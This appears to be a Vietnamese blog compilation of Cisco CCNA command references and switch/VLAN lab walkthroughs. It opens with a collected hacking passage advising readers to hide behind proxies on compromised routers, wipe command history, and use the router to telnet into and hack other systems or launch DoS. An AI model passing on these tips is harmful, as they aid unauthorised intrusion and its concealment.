Để sử dụng thiết bị cao cấp tuyệt vời này, bạn phải kết nối tới chúng, sử dụng proxy nếu không muốn IP của bạn log. Khi đã đăng nhập, bạn nên tắt phần history để không ai có thể biết bạn đã làm gì, gõ vào "terminal history size 0". Và nó sẽ chẳng ghi lại gì! Gõ "?" để hiện một danh sách tất cả các lệnh của router, và bạn sẽ dùng được hầu hết trong số chúng.

Các router thường có telnet, và bạn có thể dùng telnet để kết nối connect tới các hệ thống khác, (như một hệ unix) và hack chúng. Nó cũng được trang bị ping và traceroute-bạn có thể sử dụng chúng để theo dõi hệ thống hoặ tấn công DoS. Bạn còn có thể sử dụng nó để bắt các gói tin, nhưng tôi khuyên bạn không nên, bởi lẽ không phải lúc nào nó cũng hoạt động, và có thể làm cho bạn bị phát hiện...

(Sưu Tầm)

url:http://www.ddcntt.vn/forum/showthread.php?t=396

Tất cả các lệnh cấu hình trong CCNA theo chuyên mục

2008-10-02T03:52:00.000-07:00

Phần 1. Routing - Định Tuyến (Các giao thức phức tạp)
OSPF.

Note: Tất cả những router có cùng area phải cấu hình giống nhau tất cả các thông số thì khu vực đó mới hoạt động đúng chức năng được.

1. Cấu hình cơ bản

Router(config)#router ospf process ID
Router(config-router)#network Network_number Wildcard_mask area_ID

2. Cấu hình priority ở các interface để bầu DR và BDR

Priority càng lớn thì khả năng được bầu làm DR càng cao, ngược với bầu Root brige của Switch, càng nhỏ thì lại càng được bầu.

Router(config)#interface fastethernet 0/0
Router(config-int)#ip ospf priority 55

Sau khi cấu hình xong priority có thể kiểm tra bằng lệnh.

Router# show ip ospf interface f0/0

3. Chỉnh sửa lại OSPF cost metric trong mỗi interface

Cost càng nhỏ thì tuyến đó càng được coi là best path

Router(config-int)#ip ospf cost 1

4.Cấu hình OSPF Authentication ở các interface và áp dùng vào router

Authentication key được hiểu như là password để các router trong cùng một vùng chia sẻ với nhau.

a.Cấu hình authentication đơn giản

Router(config-if)#ip ospf authentication-key password
Router(config-router)#area area number authentication

b.Cấu hình authentication theo dạng mã hoá, bảo mật cao.

Router(config-if)ip ospf message-digest-key key ID md5 encryption-type key
Router(config-router)#area area ID authentication message-digest

5.Cấu hình OSPF timer trong các interface

Router(config-if)ip ospf hello-interval timer
Router(config-if)ip ospf dead-interval timer

6.Cấu hình quảng bá một tuyến mặc định trong OSPF

Router(config-router)#default-information originate

7.Quảng bà một tuyến khác (không phải là default)

Router(config-router)#redistribute protocols subnets

8.Các lệnh show dùng để kiểm tra cấu hình OSPF

show ip protocol
show ip route
show ip ospf
show ip ospf interface
show ip ospf database
show ip ospf neighbor detail
clear ip route *
debug ip ospf events
debug ip ospf adj

EIGRP

1.Cấu hình cơ bản.

Router(config)#router eigrp autonomous number
Router(config-router)#network network number
Router(config-router)#eigpr log-neighbor-changes (Không có cũng được)
Router(config-router)#no auto-summary

2.Thay đổi băng thông và tự tổng hợp tuyến trong interface

Router(config-if)#bandwidth kilobits
Router(config-if)#ip summary-address protocol AS network number subnets mask

3.Cân bằng tải trong EIGRP

Router(config-router)#variance number

4.Quảng bá default route

Cách 1:
Router(config)#ip route 0.0.0.0 0.0.0.0 [interface/nexthop]
Router(config)#redistribute static

Cách 2:
Router(config)#ip default-network network number

Cách 3:
Router(config-if)#ip summary-network eigrp AS number 0.0.0.0 0.0.0.0

5.Quảng bá các tuyến khác trong EIGRP (không phải là default)

Router(config-router)#redistribute protocol process ID metrics k1 k2 k3 k4 k5
Ex: Router(config-router)#redistribute ospf metrics 100 100 100 100 100

6.Chia sẻ traffic trong EIGRP

Router(config-router)#traffic share {balanced/min}

7.Các lệnh kiểm tra cấu hình EIGRP

- show ip eigrp neighbor
- show ip eigrp interface
- show ip eigrp topology
- show ip eigrp traffic
- debug eigrp fsm
- debug eigrp packet

Phần 2. Switching - Chuyển mạch

1.Cấu hình cơ bản chung cho một Switch

Reset tất cả cấu hình của Switch và reload lại.

Switch#delete flash:vlan.dat
Switch#erase startup-config
Switch#reload

2.Cấu hình về Security và management

Switch(config)#hostname tên switch
Switch(config)#line console 0
Switch(config-line)#password mật khẩu
Switch(config-line)#login

Switch(config)#line vty 0 4
Switch(config-line)#pass mật khẩu
Switch(config-line)#login

3.Thiết lập địa chỉ IP và default gateway cho Switch

Switch(config)#interface vlan1
Switch(config-int)#ip address địa chỉ subnetmask
Switch(config)#ip default-gateway địa chỉ

4.Thiết lập tốc độ và duplex của cổng

Switch(config-int)#speed tốc độ
Switch(config-int)#duplex full

5.Thiết lập dịch vụ HTTP và cổng

Switch(config)#ip http server
Switch(config)#ip http port 80

6.Thiết lập, quản lý địa chỉ MAC

Switch(config)#mac-address-table static địa chỉ MAC interface fastethernet số vlan
Switch#show mac-address-table
Switch#clear mac-address-table

7.Cấu hình bảo mật cho cổng

Switch(config-if)#switchport mode acess
Switch(config-if)#switchport port-security

Cấu hình Static: Switch(config-if)#switchport port-security mac-address địa chỉ Mac

Cấu hình Sticky: Switch(config-if)#switchport port-security mac-address sticky (thông dụng nhất)

Switch(config-if)#switchport port-security maximum value
Switch(config-if)#switchport port-security violation shutdown

8.Tạo Vlan

Cách 1.

Switch#vlan database
Switch(vlan)#vlan number

Cách 2. Khi gán các cổng vào vlan, dù vlan chưa tồn tại nhưng Switch vẫn tự tạo.

Switch(config)#interface fastethernet 0/0
Switch(config-int)#switchport access vlan vlan-id

Muốn xoá vlan ta làm như sau:

Switch(config-if)#no switchport access vlan vlan-id
Switch#clear vlan vlan_number (xoá toàn bộ vlan )

9.Gán nhiều cổng vào trong vlan cùng một lúc, cấu hình Range

Đối với dãy cổng không liên tục.
Switch(config)#interface range cổng 1 , cổng 2 , cổng 3

Đối với một dãy liên tục.
Switch(config)#interface range cổng 1-n
Switch(config-range)#switchport access vlan vlan-id

Ví dụ:
Switch(config)#interface range f0/0 , f0/2 , f0/4
Switch(config)#interface range f0/0-10
Switch(config-range)#switchport access vlan 10

10.Cấu hình Trunk

Switch(config-if)#switchport mode trunk
Switch(config-if)#switchpor trunk encapsulation encapsulation-type
Switch#show trunk

11.Cấu hình VTP

Switch#vlan database
Switch(vlan)#vtp v2-mode
Switch(vlan)#vtp domain tên domain
Switch(vlan)#vtp {server/client/transperant}
Switch(vlan)#vtp password password (Tạo pass cho domain)
Switch#show vtp status

12.Cấu hình Inter-Vlan trên Router

Router(config)#interface fastethernet 0/0.1
Router(config-subif)#encapsulation type
Router(config-subif)#ip address địa chỉ subnetmask

Phần 3. Access-list và các cấu hình liên quan.

1.Nhắc lại về lý thuyết.

Có 2 loại access-list.

- Loại thứ nhất: Standard IP Access-list chỉ lọc dữ liệu dựa vào địa chỉ IP nguồn. Range của loại này là từ 1à 99. Nên được áp dụng với cổng gần đích nhất.

- Loại thứ hai: Extended IP Access-list lọc dữ liệu dựa vào
o Địa chỉ IP nguồn
o Địa chỉ IP đích
o Giao thức (TCP, UDP)
o Số cổng (HTTP, Telnet…)
o Và các thông số khác như Windcard mask
Range của loại này là từ 100 à199. Nên được áp dụng với cổng gần nguồn nhất.

Hai bước để cấu hình Access-list
- Bước 1: Tạo access-list trong chế độ cấu hình config.
- Bước 2: Áp dụng access-list cho từng cổng tuỳ theo yêu cầu ở chế độ cấu hình (config-if)

Lưu ý:
- Mặc định của tất cả Access-list là deny all, vì vậy trong tất cả các access-list tối thiểu phải có 1 lệnh permit. Nếu trong access-list có cả permit và deny thì nên để các dòng lệnh permit bên trên.
- Về hướng của access-list (In/Out) khi áp dụng vào cổng có thể hiểu đơn giản là: In là từ host, Out là tới host hay In vào trong Router, còn Out là ra khỏi Router.
- Đối với IN router kiểm tra gói tin trước khi nó được đưa tới bảng xử lý. Đối vơi OUT, router kiểm tra gói tin sau khi nó vào bảng xử lý.
- Windcard mask được tính bằng công thức:
WM = 255.255.255.255 – Subnet mask (Áp dụng cho cả Classful và Classless addreess)
- 0.0.0.0 255.255.255.255 = any.
- Ip address 0.0.0.0 = host ip address (chỉ định từng host một )

2.Cấu hình Standard Access-list (Ví dụ)

Router(config)#access-list 1 deny 172.16.0.0 0.0.255.255
Router(config)#access-list 1 permit any
Router(config)#interface fastethernet 0/0
Router(config-in)#ip access-group in

3.Cấu hình Extended Access-list (Ví dụ)

Router(config)#access-list 101 deny tcp 172.16.0.0 0.0.255.255 host 192.168.1.1 eq telnet
Router(config)#access-list 101 deny tcp 172.16.0.0 0.0.255.255 host 192.168.1.2 eq ftp
Router(config)#access-list 101 permit any any
Router(config)#interface fastethernet 0/0
Router(config-int)#ip access-group out

4.Cấu hình named ACL thay cho các số hiệu.

Router(config)#ip access-list extended server-access (tên của access-list)
Router(config-ext-nacl)#permit tcp any host 192.168.1.3 eq telnet
Router(config)#interface fastethernet 0/0
Router(config-int)#ip access-group server-access out

5.Permit hoặc Deny Telnet sử dụng Standard Acl (Ví dụ)

Router(config)#access-list 2 permit 172.16.0.0 0.0.255.255
Router(config)#access-list 2 deny any
Router(config)#line vty 0 4
Router(config-line)#password cisco
Router(config-line)#login
Router(config-line)#ip access-class 2 in

6.Xoá và kiểm tra Access-list

Muốn xoá thì ta dùng lệnh sau:
Router(config)# no ip access-list số hiệu

Kiểm tra Acl ta dùng các lệnh sau:

- show access-list
- show running-config
- show ip interface

Phần 4. NAT – PPP – Frame Relay

I.Cấu hình NAT

* Cấu hình Static NAT

Cấu hình NAT trong chế độ Router(config). Các lệnh như sau

Router(config)#ip nat inside source static [inside local address] [inside global address]
Ví dụ:
R(config)#ip nat inside source statice 10.0.0.1 202.103.2.1 (Địa chỉ 10.10.0.1 sẽ được chuyển thành 202.103.2.1 khi đi ra khỏi Router)

Sau khi cấu hình xong phải áp dụng vào cổng in và cổng out, trong ví dụ dưới đây, cổng Ethernet là công in, còn cổng Serial là cổng out

Router(config)#interface ethernet 0
Router(config-if)#ip nat inside

Router(config)#interface serial 0
Router(config-if)#ip nat outside

* Cấu hình Dynamic NAT

Router(config)#ip nat pool [ tên pool] [A.B.C.D A1.B1.C1.D1] netmask [mặt nạ]
Router(config)#ip nat inside source list [số hiệu ACL] pool [tên pool]
Router(config)#access-list [số hiệu ACL] permit A.B.C.D windcard masks

Ví dụ:
R(config)#ip nat pool nat-pool1 179.9.8.80 179.9.8.95 netmask 255.255.255.0
R(config)#ip nat inside source list 1 pool nat-pool1
R(config)#access-list 1 permit 10.1.0.0 0.0.0.255

Sau đó áp vào cổng In và Out như Static NAT

Note: Giải địa chỉ inside local address và inside global address phải nằm trong giải cho phép của ACL

* Cấu hình PAT overload

*
o Cấu hình overload với 1 địa chỉ IP cụ thể.

Router(config)#ip nat pool [tên pool] [ip global inside] [subnet mask]
Router(config)#ip nat inside source list [tên số hiệu ACL] pool [tên pool] overload
Router(config)#access-list [số hiệu] permit [địa chỉ] [windcard mask]

Ví dụ:
R(config)#access-list 2 permit 10.0.0.0 0.0.0.255
R(config)#ip nat pool nat-pool2 179.9.8.20 255.255.255.240
R(config)#ip nat inside source list 2 nat-pool2 overload

*
o Cấu hình overload dùng địa chỉ của cổng ra.(Thường xuyên được dung hơn là trường hợp trên)

Router(config)#ip nat inside source list [tên số hiệu ACL] interface [cổng ra] overload
Router(config)#access-list [số hiệu] permit [địa chỉ] [windcard mask]

Ví dụ:
R(config)#ip nat inside source list 3 interface serial 0 overload
R(config)#access-list 3 permit 10.0.0.0 0.0.0.255

* Các lệnh Clear NAT/PAT

Lệnh xóa tất cả dynamic nat trên toàn bộ các interface.
Router#clear ip nat translation *

Lệnh xóa các single nat trên từng interface
Router#clear ip nat translation [inside/outside] [global ip - local ip]

Lệnh xóa các extended nat trên từng interface
Router#clear ip nat translation protocol [inside/outside] [global ip - global port – local ip – local port]

* Kiểm tra và Debug các NAT và PAT

Router#show ip nat translation
Router#show ip nat statics
Router#debug ip nat

* Cấu hình DHCP

Router(config)#ip dhcp excluded-address ip-address (end-ip-address)
Router(config)#ip dhcp pool [tên pool]
Router(dhcp-config)#network addess subnetmask
Router(dhcp-config)#default-router address
Router(dhcp-config)#dns-server address
Router(dhcp-config)#netbios-name-server address
Router(dhcp-config)#domain-name tên domain
Router(dhcp-config)#lease ngày/giờ/phút

* Kiểm tra và troubleshoot cấu hình DHCP

Router#show ip dhcp binding
Router#debug ip dhcp server events

* Trong trường hợp DHCP server không nằm cùng mạng với host

Note: khi DHCP server không cùng mạng với host thì ta phải dùng lệnh ip helper-address giúp host đến DHCP server.

Router(config)#interface [cổng nằm cùng mạng với host]
Router(config-if)#ip helper-address [địa chỉ của DHCP server]

Note: Trong trường hợp muốn gói tin của host được broadcast ở mạng chứa DHCP thì ta dùng thêm lệnh ip directed-broadcast ở cổng cùng mạng với DHCP server

Router(config)#interface [cổng nằm cùng mạng với dhcp]
Router(config-ì)#ip directed-broadcast

II. Cấu hình PPP

1. Cấu hình cơ bản:

R(config)#interface serial 0/0
R(config-if)#encapsulation ppp

2. Cấu hình PAP

Cấu hình PAP không yêu cầu hai Router giống nhau về password nhưng CHAP thì phải có.

(Cấu hình trên RA)
R(config)#host RA
RA(config)#username RB password 321
RA(config-if)#encapsulation ppp
RA(config-if)#ppp authentication pap
RA(config-if)#ppp pap sent-username RA password 123

(Cấu hình trên RB)
R(config)#host RB
RB(config)#username RA password 123
RB(config-if)#encapsulation ppp
RB(config-if)#ppp authentication pap
RB(config-if)#ppp pap sent-username RB password 321

3. Cấu hình CHAP. (yêu cầu phải giống nhau về password)

(Cấu hình trên RA)
R(config)#host RA
RA(config)#username RB password 123
RA(config-if)encapsulation ppp
RA(config-if)ppp authentication chap

(Cấu hình trên RB)

R(config)#host RB
RB(config)#username RA password 123
RB(config-if)encapsulation ppp
RB(config-if)ppp authentication chap

4. Các cấu hình khác của PPP

a. Cấu hình Multilink

R(config-if)#encapsulation ppp
R(config-if)#ppp multilink

b. Cấu hình Compression

R(config-if)#encapsulation ppp
R(config-if)#compress [predictor/stac/mppc]

c. Cấu hình Error detection

R(config-if)#encapsulation ppp
R(config-if)#ppp quality [phần trăm]

5. Các lệnh kiểm tra cấu hình PPP

R#show interface (xem encapsulation)
R#debug ppp negotiation (Xem quá trình kết nối giữa 2 node)
R#debug ppp authentication (Xem quá trình xác thực giữa 2 node)

III. Cấu hình Frame-Relay

1. Cấu hình đơn giản

R(config-if)#encapsulation frame-relay {ciso| ietf} (mặc định là cisco)

Khi lệnh này được thực thi, DLCI sẽ được Inverse ARP tự động map, người dùng không cần phải làm gì cả.

* Nhưng Inverse ARP không làm việc với các kết nối Hub-and-Spoke

2. Cấu hình Frame-relay static map

R(config-if)#encapsulation frame-relay
R(config-if)#frame-relay map ip remote–ip-address local-dlci [broadcast] [cisco| ietf]
(ip address trong dòng lệnh trên chỉ lấy làm minh họa bởi nó rất phổ biến, chính xác phải là remote–protocol–address)
Broadcast trong câu lệnh trên có 2 chức năng:
§ Forward broadcast khi multicast không được khởi động.
§ Đơn giản hóa cấu hình OSPF cho mạng nonbroadcast sử dụng FRelay.
Ví dụ:

R(config-if)#encapsulation frame-relay
R(config-if)#frame-relay map ip 192.168.2.1 100 broadcast

3. Cấu hình FR trong mạng None Broadcast MutiAccess

- Trong mạng Broadcast khi 1 máy tính truyền frame tất cả các node lắng nghe frame nhưng chỉ có node cần nhận mới nhận được.
- Trong mạng None Broadcast khi 1 máy tính truyền frame thì chỉ có node cần nhận mới lắng nghe và nhận được frame đó, các node còn lại thì không. Frame được truyền qua 1 virtual Circuit hoặc 1 thiết bị chuyển mạch.
- Star topology có thể được coi như là 1 mạng Hub and Spoke.

4. Giải quyết vấn đề với Routing Updates mà không disable Split Horizal

Giải pháp dùng Sub-interface

R(config)#interface s0/0
R(config-if)#encapsulation frame-relay
R(config-if)interface s0/0.1 [multipoint| point-to-point]

- point-to-point: Mỗi subinterface có subnet riêng của mình. Broadcast và Split horizol không là vấn đề.
- Multi-point: Tất cả các subinterface liên quan phải cùng chung 1 subnet và như vậy Broadcast và Split horizol sẽ có vấn đề.

Ví dụ:
(Point-to-point)
R(config)#interface s0/0
R(config-if)#encapsulation frame-relay
R(config-if)#interface s0/0.1 point-to-point
R(config-subif)#frame-relay interface-dlci 18

(Multipoint)
R(config)#interface s0/0
R(config-if)#encapsulation frame-relay
R(config-if)#interface s0/0.2 multipoint
R(config-subif)#frame-relay interface-dlci 19
R(config-subif)#frame-relay interface-dlci 20

5. Cấu hình trên Frame-relay Switching (ví dụ)

R(config)#frame-relay switching
R(config)#interface s0/0
R(config-if)#encapsulation frame-relay
R(config-if)#frame-relay intf-type dce
R(config-if)#frame-relay route 103interface serial 0/1 301

(Theo [Chỉ có thành viên của diễn đàn mới xem được nội dung của liên kết này. ] Moderator)

Cấu hình switch cơ bản

2008-10-02T01:02:00.001-07:00

Cấu hình switch cơ bản
Lab 1-1: Cấu hình switch cơ bản

Mô tả

Cấu hình các thông số cơ bản cho Catalys Switch với giao diện dòng lệnh CLI. Các tác vụ cần thực hiện bao gồm đặt tên cho switch, cấu hình các interface vlan, cấu hình để telnet vào switch….Dùng máy trạm kết nối với switch qua kết nối console, giao diện tương tác người dùng sử dụng trình HyperTerminal. Đây là một công cụ đuợc MS Windows hỗ trợ.

Thực hiện

1. Khởi động nguồn của switch. Trên giao diện Hyper Terminal hiện ra các thông số khởi tạo trong quá trình khởi động Switch.
% Please answer 'yes' or 'no'.
Would you like to enter the initial configuration dialog? [yes/no]: no
Press RETURN to get started!
00:04:13: %LINK-5-CHANGED: Interface Vlan1, changed state to administratively down
00:04:14: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
Người dùng sẽ được hỏi nếu muốn vào các hộp thoại để cấu hình tự động, trả lời NO (vì mục đích của người dùng là muốn vào chế độ CLI (command line interface).

2. Vào enable mode xem cấu hình mặc định của switch

Switch>enable
Switch#show running-config
Building configuration...
Current configuration : 1473 bytes
!
version 12.1
!
hostname Switch
!
ip subnet-zero
!
spanning-tree mode pvst
spanning-tree extend system-id
!
interface FastEthernet0/1
no ip address
!
interface FastEthernet0/2
no ip address
!
interface FastEthernet0/3
no ip address
!
interface FastEthernet0/4
no ip address
!
interface FastEthernet0/5
no ip address
!
interface FastEthernet0/6
no ip address
!
interface FastEthernet0/7
no ip address
!
interface FastEthernet0/8
no ip address
!
interface FastEthernet0/9
no ip address
!
interface FastEthernet0/10
no ip address
!
interface FastEthernet0/11
no ip address
!
interface FastEthernet0/12
no ip address
!
interface GigabitEthernet0/1
no ip address
!
interface GigabitEthernet0/2
no ip address
!
interface Vlan1
no ip address
shutdown
!
ip classless
ip http server
!
line con 0
line vty 5 15
!
end

3. Thiết lập các thông số cho switch như hostname, enable password, console password và virtual terminal password. Các loại password sử dụng có phân biệt chữ thường và chữ hoa. Do đó người dùng cần phân biết các ký tự sử dụng chữ viết hoa khác với chữ viêt thường. Ví dụ Cisco khác với cisco.

Switch#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname Vnpro
Vnpro(config)#enable password cisco
Vnpro(config)#enable secret class
Vnpro(config)#line console 0
Vnpro(config-line)#password console
Vnpro(config-line)#login
Vnpro(config-line)#^Z

Switch hỗ trợ các Virtual Line dùng cho các phiên telnet. Cần cấu hình password cho các line này mới có thể telnet vào Switch (trình tự cấu hình hỗ trợ telnet sẽ trình bày sau). Để xem thông tin về các Virtual Line trên Switch: dùng lệnh “show line”.

Vnpro#show line
Tty Typ Tx/Rx A Modem Roty AccO AccI Uses Noise Overruns Int
* 0 CTY - - - - - 0 0 0/0 -
1 VTY - - - - - 0 0 0/0 -
2 VTY - - - - - 0 0 0/0 -
3 VTY - - - - - 0 0 0/0 -
4 VTY - - - - - 0 0 0/0 -
5 VTY - - - - - 0 0 0/0 -
6 VTY - - - - - 0 0 0/0 -
7 VTY - - - - - 0 0 0/0 -
8 VTY - - - - - 0 0 0/0 -
9 VTY - - - - - 0 0 0/0 -
10 VTY - - - - - 0 0 0/0 -
11 VTY - - - - - 0 0 0/0 -
12 VTY - - - - - 0 0 0/0 -
13 VTY - - - - - 0 0 0/0 -
14 VTY - - - - - 0 0 0/0 -
15 VTY - - - - - 0 0 0/0 -
16 VTY - - - - - 0 0 0/0 -

Cấu hình password cho các line vty
Vnpro#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Vnpro(config)#line vty 0 4
Vnpro(config-line)#password cisco
Vnpro(config-line)#login

Cấu hình trên thiết bị Cisco, mỗi dòng lệnh do người dùng gõ vào. Sau khi nhấn phím “enter” cấu hình hệ thống sẽ lập tức thay đổi. Vì vậy, đối với các hệ thống mạng thật, trước khi thay đổi một thông số nào đó của thiết bị, cần phải sao lưu lại cấu hình ban đầu để có thể khôi phục lại khi cần thiết.

Bước 4: cấu hình Vlan.
Kiếm tra cấu hình Vlan mặc định trên Switch
Vnpro#show vlan
VLAN Name Status Ports
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4
Fa0/5, Fa0/6, Fa0/7, Fa0/8
Fa0/9, Fa0/10, Fa0/11, Fa0/12
Fa0/13, Fa0/14, Fa0/15, Fa0/16
Fa0/17, Fa0/18, Fa0/19, Fa0/20
Fa0/21, Fa0/22, Fa0/23, Fa0/24
Gi0/1, Gi0/2
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 0 0
1003 tr 101003 1500 - - - - - 0 0
1004 fdnet 101004 1500 - - - ieee - 0 0
1005 trnet 101005 1500 - - - ibm - 0 0
Remote SPAN VLANs
------------------------------------------------------------------------------
Primary Secondary Type Ports
------- --------- ----------------- ------------------------------------------
Mặc định trên Switch chỉ có Vlan 1 với tất cả các port đều nằm trong Vlan này, Vlan 1002 dành riêng cho FDDI, Vlan 1003 dành riêng cho TOKEN-RING…Có hai cách tạo thêm Vlan
Cách 1:Thao tác trên Vlan database
Vnpro#vlan database
Vnpro(vlan)#vtp domain Chuyenviet
Changing VTP domain name from NULL to Chuyenviet
Vnpro(vlan)#vtp server
Setting device to VTP SERVER mode.
Vnpro(vlan)#vlan 10 name Admin
VLAN 10 added:
Name: Admin
Vnpro(vlan)#vlan 20 name User
VLAN 20 added:
Name: User
Vnpro(vlan)#apply
APPLY completed.
Vnpro(vlan)#exit
APPLY completed.
Exiting....
Cách 2: Tưong tác trực tiếp đến Vlan cần tạo ra
Vnpro(config)#interface vlan 10
Vnpro(config-if)#exit
Vnpro(config)#
Vnpro(config)#interface vlan 20
Vnpro(config-if)#exit
Vnpro(config)#
Để gán các port vào các Vlan, thực hiện các bước sau:
Ví dụ ta cần gán các port fastethernet 2 vào Vlan 10, port fastetehnet 3 vào Vlan 20
Vnpro(config)#interface fastethernet0/2
Vnpro(config-if-range)#switchport access vlan 10
Vnpro(config-if-range)#exit
Vnpro(config)#interface fastethernet0/3
Vnpro(config-if-range)#switchport access vlan 20
Vnpro(config-if-range)#exit
Kiểm tra lại cấu hình Vlan
Vnpro#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/4, Fa0/5, Fa0/6
Fa0/7, Fa0/8, Fa0/9, Fa0/10
Fa0/11, Fa0/12, Fa0/13, Fa0/14
Fa0/15, Fa0/16, Fa0/17, Fa0/18
Fa0/19, Fa0/20, Fa0/21, Fa0/22
Fa0/23, Fa0/24, Gi0/1, Gi0/2
10 Admin active Fa0/2
20 User active Fa0/3
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
Cấu hình IP cho interface Vlan: các interface Vlan được cấu hình IP chỉ mang tính chất luận lý. IP này phục vụ cho việc quản lý, địa chỉ IP luận lý này còn có thể dùng để telnet vào Switch từ xa và chạy các ứng dụng SNMP.
Vnpro#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Vnpro(config)#interface vlan 10
Vnpro(config-if)#ip address 10.0.0.1 255.255.255.0
Vnpro(config-if)#no shutdown
Vnpro(config-if)#^Z
00:14:43: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan10, changed state to down
00:14:43: %SYS-5-CONFIG_I: Configured from console by console
Lưu cấu hình vào NVRAM
Vnpro#copy running-config startup-config
Destination filename [startup-config]?
Building configuration...
[OK]
Cần chú ý gán default-gateway cho switch bằng câu lệnh
VnPro#ip default-gateway 10.0.0.100
Địa chỉ 10.0.0.100 có thể dùng là địa chỉ của PC được dùng để telnet vào switch.

url:http://vnpro.org/forum/showthread.php?t=5560

Lab 6-1: Cấu hình vlan và trunk

2008-10-01T22:02:00.000-07:00

Lab 6-1: Cấu hình vlan và trunk

MultiLayer Sitching & InterVlan Routing

http://vnpro.org/forum/files/labswitching/lab61/lab61-1.JPG

Mô tả đặc tính hoạt động đa lớp (Multilayer) của dòng sản phẩm Catalyst 3550 của Cisco Access Layer Switch (ALSwitch). Chia switch thành các Vlan1, Vlan 10, Vlan 20 phân phối cho từng nhóm người dùng. Thông thường các Vlan hoạt động ở lớp liên kết dữ liệu (Data-link Layer). Các Vlan này xem như thuộc các Broadcast Domain khác nhau, không thể nói chuyện với nhau được (mặc dù cùng kết nối vật lý đến ALSwitch). Các Vlan muốn nói chuyện với nhau phải thông qua một External Router có chức năng định tuyến. Trong phạm vi bài Lab này, sử dụng khả năng Multilayer Switching của Catalyst 3550 để định tuyến giữa các vlan cũng như giữa các Vlan với Remote office kết nối bởi Remote router. Trong trường hợp này Catalyst 3550 có khả năng hoạt động như một External Router.
Yêu cầu thiết bị: Remote router: Cisco 2600 (có cổng FastEthernet). Distribute Layer Switch (DLSwitch): Catalyst 3550. Access Layer Switch (ALSwitch): Catalyst 2900 trở lên (vì cấu hình Trunking đòi hỏi thiết bị hỗ trợ FastEthernet). Các máy trạm kết nối vào các Vlan phục vụ việc kiểm tra cấu hình và các tính năng định tuyến.
Để triển khai tính năng MultiLayer Switching (MLS):
Giai đoạn 1: Thiết lập các cấu hình cơ sở bao gồm: chia Vlan, Trunking giữa các switch.
Giai đoạn 2: Cấu hình cho Catalyst 3550 (DLSwitch) hoạt động ở chế độ MLS, cấu hình các giao thức định tuyến trên Router. Trong phạm vi bài Lab này, dùng giao thức định tuyến OSPF. Trước khi triền khai bài Lab, nên xoá tất cả cấu hình cũ trên Switch và Router để tránh các ảnh hưởng đến hoạt động của hệ thống
Tiến hành giai đoạn:
DLSwitch và ALSwitch kết nối với nhau qua đường Trunk. Hai Switch này cùng một VTP domain, chia thành các Vlan gồm: Vlan 1 (Native), Vlan 10 (Admin), Vlan 20 (User).
Cấu hình trên DLSwitch
Cấu hình các thông số cơ bản: gồm tên, các loại password:
Switch>enable
Switch#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname DLSwitch
DLSwitch(config)#enable password cisco
DLSwitch(config)#enable secret vnpro
DLSwitch(config)#line vty 0 15
DLSwitch(config-line)#password cisco
DLSwitch(config-line)#login
DLSwitch(config-line)#^Z
00:15:08: %SYS-5-CONFIG_I: Configured from console by console
Cấu hình Vlan và Trunking:
DLSwitch#vlan database
DLSwitch(vlan)#vtp domain Vnpro
Changing VTP domain name from NULL to Vnpro
DLSwitch(vlan)#vtp server
Device mode already VTP SERVER.
DLSwitch(vlan)#vlan 10 name Admin
VLAN 10 added:
Name: Admin
DLSwitch(vlan)#vlan 20 name User
VLAN 20 added:
Name: User
DLSwitch(vlan)#apply
APPLY completed.
DLSwitch(vlan)#exit
APPLY completed.
Exiting....
DLSwitch#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
DLSwitch(config)#interface vlan 1
DLSwitch(config-if)#ip address 192.168.1.1 255.255.255.0
DLSwitch(config-if)#no shutdown
DLSwitch(config-if)#exit
00:17:26: %LINK-3-UPDOWN: Interface Vlan1, changed state to up
DLSwitch(config)#interface vlan 10
DLSwitch(config-if)#ip address 192.168.10.1 255.255.255.0
DLSwitch(config-if)#no shutdown
00:18:20: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan10, changed state to down
DLSwitch(config-if)#exit
DLSwitch(config)#interface vlan 20
DLSwitch(config-if)#ip address 192.168.20.1 255.255.255.0
DLSwitch(config-if)#no shutdown
00:19:06: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan20, changed state to down
DLSwitch(config-if)#exit
DLSwitch(config)#interface FastEthernet 0/1
DLSwitch(config-if)#switchport trunk encapsulation dot1q
DLSwitch(config-if)#switchport mode trunk
DLSwitch(config-if)#^Z
00:20:11: %SYS-5-CONFIG_I: Configured from console by console
Kiểm tra thông tin Vlan mới:
DLSwitch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/2, Fa0/3, Fa0/4, Fa0/5
Fa0/6, Fa0/7, Fa0/8, Fa0/9
Fa0/10, Fa0/11, Fa0/12, Fa0/13
Fa0/14, Fa0/15, Fa0/16, Fa0/17
Fa0/18, Fa0/19, Fa0/20, Fa0/21
Fa0/22, Fa0/23, Fa0/24, Gi0/1
Gi0/2
10 Admin active
20 User active
1002 fddi-default act/unsup
1003 token-ring-default act/unsup
1004 fddinet-default act/unsup
1005 trnet-default act/unsup
Cấu hình trên ALSwitch
Cấu hình các thông số cơ bản: gồm tên, các loại password:
Switch>enable
Switch#config terminal
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#hostname ALSwitch
ALSwitch(config)#enable password cisco
ALSwitch(config)#enable secret vnpro
ALSwitch(config)#line vty 0 4
ALSwitch(config-line)#password cisco
ALSwitch(config-line)#login
ALSwitch(config-line)#^Z
00:07:40: %SYS-5-CONFIG_I: Configured from console by console
Cấu hình Vlan và Trunking
